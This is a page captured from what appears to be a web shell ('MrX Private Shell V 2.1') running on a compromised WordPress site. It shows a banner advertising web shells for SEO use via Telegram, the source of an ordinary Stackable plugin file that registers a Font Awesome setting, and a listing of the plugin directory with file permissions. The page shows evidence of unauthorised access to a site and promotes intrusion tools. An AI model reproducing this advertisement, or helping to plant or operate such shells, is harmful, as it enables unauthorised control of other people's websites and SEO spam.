__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* Loads the Font Awesome Kit
*/
// Exit if accessed directly.
if ( ! defined( 'ABSPATH' ) ) {
exit;
}
if ( ! class_exists( 'Stackable_Icons' ) ) {
/**
* Stackable Icons
*/
class Stackable_Icons {
/**
* Initialize
*/
function __construct() {
add_action( 'admin_init', array( $this, 'register_icon_settings' ) );
add_action( 'rest_api_init', array( $this, 'register_icon_settings' ) );
// Make our settings available in the editor.
add_action( 'stackable_localize_script', array( $this, 'add_settings' ) );
}
/**
* Register the setting to select FontAwesome version
*
* @return void
*/
public function register_icon_settings() {
register_setting(
'stackable_icons',
'stackable_icons_fa_free_version',
array(
'type' => 'string',
'description' => __( 'Select FontAwesome version', STACKABLE_I18N ),
'sanitize_callback' => 'sanitize_text_field',
'show_in_rest' => true,
'default' => '',
)
);
}
/**
* Add the JS variables needed by our icon settings.
*
* @param array $args
* @return array
*/
public function add_settings( $args ) {
return array_merge( $args, array(
'iconsFaFreeKitVersion' => get_option( 'stackable_icons_fa_free_version' ),
) );
return $args;
}
}
new Stackable_Icons();
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| block | Folder | 0775 |
|
|
| block-components | Folder | 0775 |
|
|
| compatibility | Folder | 0775 |
|
|
| components | Folder | 0775 |
|
|
| deprecated | Folder | 0775 |
|
|
| design-library | Folder | 0775 |
|
|
| lightbox | Folder | 0775 |
|
|
| plugins | Folder | 0775 |
|
|
| styles | Folder | 0775 |
|
|
| welcome | Folder | 0775 |
|
|
| admin.php | File | 1.42 KB | 0775 |
|
| blocks.php | File | 3.11 KB | 0775 |
|
| css-optimize.php | File | 16.42 KB | 0775 |
|
| dynamic-breakpoints.php | File | 20.72 KB | 0775 |
|
| editor-settings.php | File | 9.49 KB | 0775 |
|
| fonts.php | File | 5.44 KB | 0775 |
|
| global-settings.php | File | 37.62 KB | 0775 |
|
| icons.php | File | 1.31 KB | 0775 |
|
| index.php | File | 88 B | 0775 |
|
| init.php | File | 20.87 KB | 0775 |
|
| jetpack.php | File | 2.29 KB | 0775 |
|
| kses.php | File | 5.1 KB | 0775 |
|
| multisite.php | File | 3.27 KB | 0775 |
|
| pro.php | File | 5.21 KB | 0775 |
|
| stk-block-types.php | File | 38.5 KB | 0775 |
|
| unique-id.php | File | 1.34 KB | 0775 |
|